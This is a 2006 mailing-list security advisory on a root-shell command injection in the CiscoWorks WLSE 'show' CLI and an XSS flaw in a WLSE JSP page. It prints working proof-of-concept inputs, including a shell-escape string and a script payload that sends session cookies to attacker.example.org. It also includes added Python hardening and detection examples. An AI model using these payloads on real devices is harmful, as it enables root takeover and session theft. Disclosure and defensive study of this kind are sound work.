

[UNIX] Multiple Vulnerabilities in Linux Based Cisco Products


From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 2 May 2006 10:56:22 +0200
Subject: [UNIX] Multiple Vulnerabilities in Linux Based Cisco Products

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com




  Multiple Vulnerabilities in Linux Based Cisco Products
------------------------------------------------------------------------


SUMMARY

The following vulnerabilities have been discovered in various Linux-based 
Cisco products:
 * A vulnerability in the CiscoWorks WLSE "show" CLI application allows 
execution of arbitrary code as the root user.
 * A cross-site scripting flaw allows session theft.

DETAILS

Software:
 * Cisco Wireless LAN Solution Engine (WLSE)
 * Cisco Hosting Solution Engine (HSE)
 * Cisco Ethernet Subscriber Solution Engine (ESSE)
 * Cisco User Registration Tool (URT)
 * CiscoWorks2000 Service Management Solution (SMS)
 * Cisco VLAN Policy Server (VPS)
 * Cisco Management Engine (ME1100 Series)
 * CiscoWorks Service Level Manager (SLM)

Vulnerability information:
(1) The Cisco shell presents the administrator with a restricted set of 
commands which includes a "show" application. The "show" application has 
several vulnerabilities which allow an attacker to "break out" of the 
shell and execute commands (including /bin/sh) as the root user.

This "show" application has been in use on this Linux-based platform build 
since 1999 and exists on several other Linux-based Cisco products.

Example:
An Administrator is logged into the Cisco WLSE via either Telnet or SSH.

  admin@wlse: show version
   (C) Copyright 2005 by Cisco Systems Inc.
   WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
   Device Limit = 2550
   Build Version (67) Tue Mar 15 18:13:02 UTC 2005
   Uptime: 2 days 3 hours 32 mins
   Linux version 2.4.28-5_WLSEsmp ([email protected]) (gcc version 2.96 20000731 (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
   1130
   Intel(R) CPU at 3065.897 Mhz with 3105924K bytes of memory.

  admin@wlse: show syslog include ";/bin/sh -i;"

  sh-2.05a# id
   uid=0(root) gid=502(admin) groups=502(admin),500(enable)

At this point the administrator has root level access to the Linux-based 
Cisco device.
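
The advisory does not show how the "show" application builds its command, so the following added example (not Cisco's code and not part of the original advisory) assumes the filter string was pasted into a shell command line and contrasts that with passing it as one argv element to a process started without a shell. The function names, the grep invocation and the sample log are assumptions constructed for illustration.

```python
import os
import subprocess
import tempfile

# Constructed syslog sample; the last line records the advisory's input as text.
SAMPLE_LOG = (
    "May  2 10:01:11 wlse sshd[411]: Accepted password for admin\n"
    "May  2 10:02:40 wlse kernel: eth0: link up\n"
    'May  2 10:03:05 wlse cli: admin ran: show syslog include ";/bin/sh -i;"\n'
)

def unsafe_command_line(pattern, log_path):
    """Assumed vulnerable shape: the pattern becomes part of a string that a
    shell parses, so characters such as ; | & in it turn into shell syntax.
    Returned for inspection only; it is never executed here."""
    return "grep " + pattern + " " + log_path

def safe_argv(pattern, log_path):
    """Hardened shape: one argv element per argument, no shell in between.
    -F: fixed string; -e: next element is the pattern even if it starts
    with '-'; --: end of options before the file name."""
    return ["grep", "-F", "-e", pattern, "--", log_path]

def show_syslog_include(pattern, log_text=SAMPLE_LOG):
    """Return the lines of log_text containing pattern, via grep without a shell."""
    # Defence in depth: refuse empty, oversized or multi-line patterns.
    if not pattern or "\x00" in pattern or "\n" in pattern or len(pattern) > 256:
        raise ValueError("rejected filter pattern")
    with tempfile.NamedTemporaryFile("w", suffix=".log", delete=False) as fh:
        fh.write(log_text)
    try:
        proc = subprocess.run(safe_argv(pattern, fh.name), shell=False,
                              capture_output=True, text=True, timeout=5)
    finally:
        os.unlink(fh.name)
    if proc.returncode not in (0, 1):   # grep: 0 = match, 1 = no match, 2 = error
        raise RuntimeError(proc.stderr.strip())
    return proc.stdout.splitlines()

if __name__ == "__main__":
    print(unsafe_command_line(";/bin/sh -i;", "/var/log/messages"))
    print(show_syslog_include(";/bin/sh -i;"))
```

With the hardened form, the advisory's input is only a search string: it matches the one log line that contains it literally and starts no second command.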

(2) A cross-site scripting flaw exists in: 
/wlse/configure/archive/archiveApplyDisplay.jsp with the "displayMsg" 
parameter. This can be used to steal the JSP session cookie, therefore 
giving a targeted attacker admin level access to the system. Once the 
attacker has admin web GUI access to the system via the XSS, they can then 
change the admin password or create a new admin user (without requiring 
the admin password).

The attacker can then use the aforementioned "show cli" local root 
vulnerability to gain complete control of the Cisco Linux-Based system.

As with (1) above, Telnet or SSH access is required to log in with the newly 
created user with admin level access in order to exploit the "show cli" 
bug.

Example:
   http://cisco-wlse.example.org/wlse/configure/archive/ \
   archiveApplyDisplay.jsp?displayMsg=<script>document.location='http:// \
   attacker.example.org?'+document.cookie</script>

The cookie posted to attacker.example.org includes the JSESSIONID token:
   ORIG_URL=cisco-wlse.example.org; browser_tzoffset=-660; \
   JSESSIONID=johjehk2h1; \
   HSE_TKT=admin:1133234898:17e5187e228ab1546ac26ef4ecacf689

When combined with vulnerability (1), it allows a targeted attacker to 
gain root access to the Linux system.
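
For issue (2), the following added example (not part of the original advisory and not Cisco's code) shows the output encoding that keeps "displayMsg" from being interpreted as markup, and uses the same check to flag requests to the affected JSP in a web access log. The log lines, client addresses and function names are constructed assumptions; only the path and parameter name come from the advisory.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/wlse/configure/archive/archiveApplyDisplay.jsp"  # from the advisory

# Constructed access-log lines (common log format); clients and times are made up.
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [02/May/2006:10:00:01 +0200] "GET ' + TARGET_PATH
    + '?displayMsg=Archive+applied HTTP/1.1" 200 512',
    '192.0.2.77 - - [02/May/2006:10:05:42 +0200] "GET ' + TARGET_PATH
    + '?displayMsg=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F'
    + 'attacker.example.org%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 640',
    '192.0.2.10 - - [02/May/2006:10:06:00 +0200] "GET /wlse/index.jsp HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def render_display_msg(value):
    """Encode the parameter for an HTML context so markup in it is shown as text."""
    return html.escape(value, quote=True)

def suspicious_display_msgs(log_lines):
    """Return (line number, decoded displayMsg) for requests to the affected
    page whose parameter would change under HTML encoding. This is a coarse
    heuristic: benign text containing & or quotes is flagged too."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != TARGET_PATH:
            continue
        for value in parse_qs(url.query).get("displayMsg", []):
            if render_display_msg(value) != value:
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_display_msgs(SAMPLE_ACCESS_LOG):
        print(number, value, "->", render_display_msg(value))
```

Setting the HttpOnly attribute on the session cookie additionally keeps script running in the page from reading JSESSIONID through document.cookie.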

Solution:
Cisco has released patches for the vulnerabilities.

Cisco advisory note:
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml

Cisco security response:
http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml

Disclosure timeline:
30-Dec-2005 - Discovered during configuration for a customer
29-Jan-2006 - Email sent to psirt[at]cisco.com with full technical details
31-Jan-2006 - Response received from Cisco psirt
01-Feb-2006 - Cisco advises bug reports have been opened for both issues
05-Apr-2006 - Cisco releases patches to Assurance.com.au for testing
19-Apr-2006 - Advisory released


ADDITIONAL INFORMATION

The information has been provided by assurance.com.au.
The original article can be found at:
http://www.assurance.com.au/advisories/200604-cisco.txt



